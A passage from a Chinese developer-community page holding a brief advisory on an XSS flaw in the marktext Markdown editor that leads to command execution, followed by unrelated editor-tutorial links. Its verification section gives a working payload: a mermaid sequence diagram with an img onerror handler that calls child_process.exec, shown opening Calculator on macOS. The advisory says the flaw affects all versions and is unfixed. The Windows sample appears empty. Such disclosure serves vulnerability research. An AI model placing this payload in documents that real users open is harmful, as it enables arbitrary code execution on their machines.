备案控制台
开发者社区 安全 文章 正文

marktext编辑器XSS触发RCE命令执行

2023-02-13 64
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: marktext编辑器XSS触发RCE命令执行

marktext编辑器XSS触发RCE命令执行

遵纪守法

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

漏洞描述

marktext编辑器XSS触发RCE命令执行

风险等级

高危

影响版本

marktext目前所有版本均受影响

资产确定

https://marktext.app/

漏洞验证

windows

sequenceDiagram
B ->> S: 1
hello ->> B:


**mac**

sequenceDiagram
 B ->> S: <img src=1 onerror="require('child_process').exec('open /System/Applications/Calculator.app')">
 hello ->> B:

修复方案

目前尚未修复

文章标签:
Windows
网络安全
安全
关键词:
编辑器命令
编辑器marktext
编辑器触发
ckcsec
目录
相关文章
泡沫o0
|
1月前
|
Shell Linux C语言
【Shell 命令集合 文本编辑器 】Linux pico 编辑器使用指南
【Shell 命令集合 文本编辑器 】Linux pico 编辑器使用指南
泡沫o0
50 1
黑夢
|
1月前
|
Linux 编译器 开发工具
Linux:详解(yum的使用、vim编辑器命令集合以及gcc/g++编译器的使用)
Linux:详解(yum的使用、vim编辑器命令集合以及gcc/g++编译器的使用)
黑夢
142 1
泡沫o0
|
1月前
|
存储 搜索推荐 Shell
【Shell 命令集合 文本编辑器】Linux joe 编辑器的使用教程
【Shell 命令集合 文本编辑器】Linux joe 编辑器的使用教程
泡沫o0
49 0
泡沫o0
|
1月前
|
Shell Linux C语言
【Shell 命令集合 文本编辑器】Linux jed 编辑器使用指南
【Shell 命令集合 文本编辑器】Linux jed 编辑器使用指南
泡沫o0
43 0
尘觉
|
1月前
|
Linux 程序员 Shell
Linux编辑器,开机重启,用户注销,用户管理 常用命令
Linux编辑器,开机重启,用户注销,用户管理 常用命令
尘觉
105 0
fensnote
|
1月前
vi编辑器替换字符串命令
vi编辑器替换字符串命令
fensnote
26 1
猫头虎
|
8月前
|
Linux Shell Go
《Linux操作系统编程》第四章 屏幕编程器vi : 了解屏幕编辑器vi的概述和基本操作命令
《Linux操作系统编程》第四章 屏幕编程器vi : 了解屏幕编辑器vi的概述和基本操作命令
猫头虎
69 0
梦回故国楼台梦
|
1月前
|
运维 自然语言处理 开发工具
【专栏】NeoVim正逐渐取代Vim成为运维人员首选的文本编辑器。这 8 个原因或许是答案,命令对比一目了然!
【4月更文挑战第28天】NeoVim正逐渐取代Vim成为运维人员首选的文本编辑器。其优势包括更好的扩展性、现代化界面、多语言编程支持、异步处理能力、协作功能、持续更新及活跃社区。NeoVim的命令与Vim相似,但在启动配置、插件管理和窗口管理等方面有所优化。总的来说,NeoVim提供了更强大、灵活和现代的编辑体验。
梦回故国楼台梦
65 0
jianz123
|
1月前
|
Linux
linux vi编辑器常用命令
linux vi编辑器常用命令
jianz123
13 0
泡沫o0
|
1月前
|
Unix Shell Linux
【Shell 命令集合 文档编辑】Linux 文本编辑器 ex命令使用指南
【Shell 命令集合 文档编辑】Linux 文本编辑器 ex命令使用指南
泡沫o0
42 0

热门文章

最新文章

  • 1
    【专栏:工具与技巧篇】使用代码编辑器(VS Code/Sublime Text)提升开发效率
  • 2
    前端react 18.2整合ckeditor富文本编辑器——配置插件、自定义toolbar工具栏(二)
  • 3
    前端 富文本编辑器原理——从javascript、html、css开始入门(二)
  • 4
    react-app框架——使用monaco editor实现online编辑html代码编辑器
  • 5
    前端react 18.2整合ckeditor富文本编辑器——配置插件、自定义toolbar工具栏(一)
  • 6
    前端 富文本编辑器原理——从javascript、html、css开始入门(一)
  • 7
    Electron Markdown编辑器实战:资源管理器实现
  • 8
    Linux课程四课---Linux开发环境的使用(vim编辑器的相关)
  • 9
    打造图像编辑器(一)——基础架构与图像滤镜
  • 10
    Java程序员最喜欢的11款免费IDE编辑器
  • 1
    视觉智能平台常见问题之web端编辑器实现如何解决
    52
  • 2
    如何在Linux使用docker部署Swagger Editor并实现无公网IP远程协同编辑API文档
    71
  • 3
    《使用「Markdown」编辑器的那些天 |CSDN编辑器测评》
    32
  • 4
    Linux:详解(yum的使用、vim编辑器命令集合以及gcc/g++编译器的使用)
    142
  • 5
    JAVA医院电子病历编辑器系统源码
    160
  • 6
    Markdown编辑器用法保存自用
    60
  • 7
    基于mathlive从零将公式编辑器集成到可视化搭建平台
    74
  • 8
    前端图形学实战: 从零实现编辑器的图层管理面板和实时缩略图(vue3 + vite版)
    52
  • 9
    基于云计算的Java电子病历编辑器源码 (B/S)
    56
  • 10
    前端 富文本编辑器原理
    62

    • 相关电子书

    更多
  • 低代码开发师(初级)实战教程
  • 冬季实战营第三期:MySQL数据库进阶实战
  • 阿里巴巴DevOps 最佳实践手册

    • 相关实验场景

    更多
  • vi编辑器的学习和使用
  • 1分钟代码漏洞自动检测
    • 下一篇
    部署LAMP环境(Alibaba Cloud Linux 3)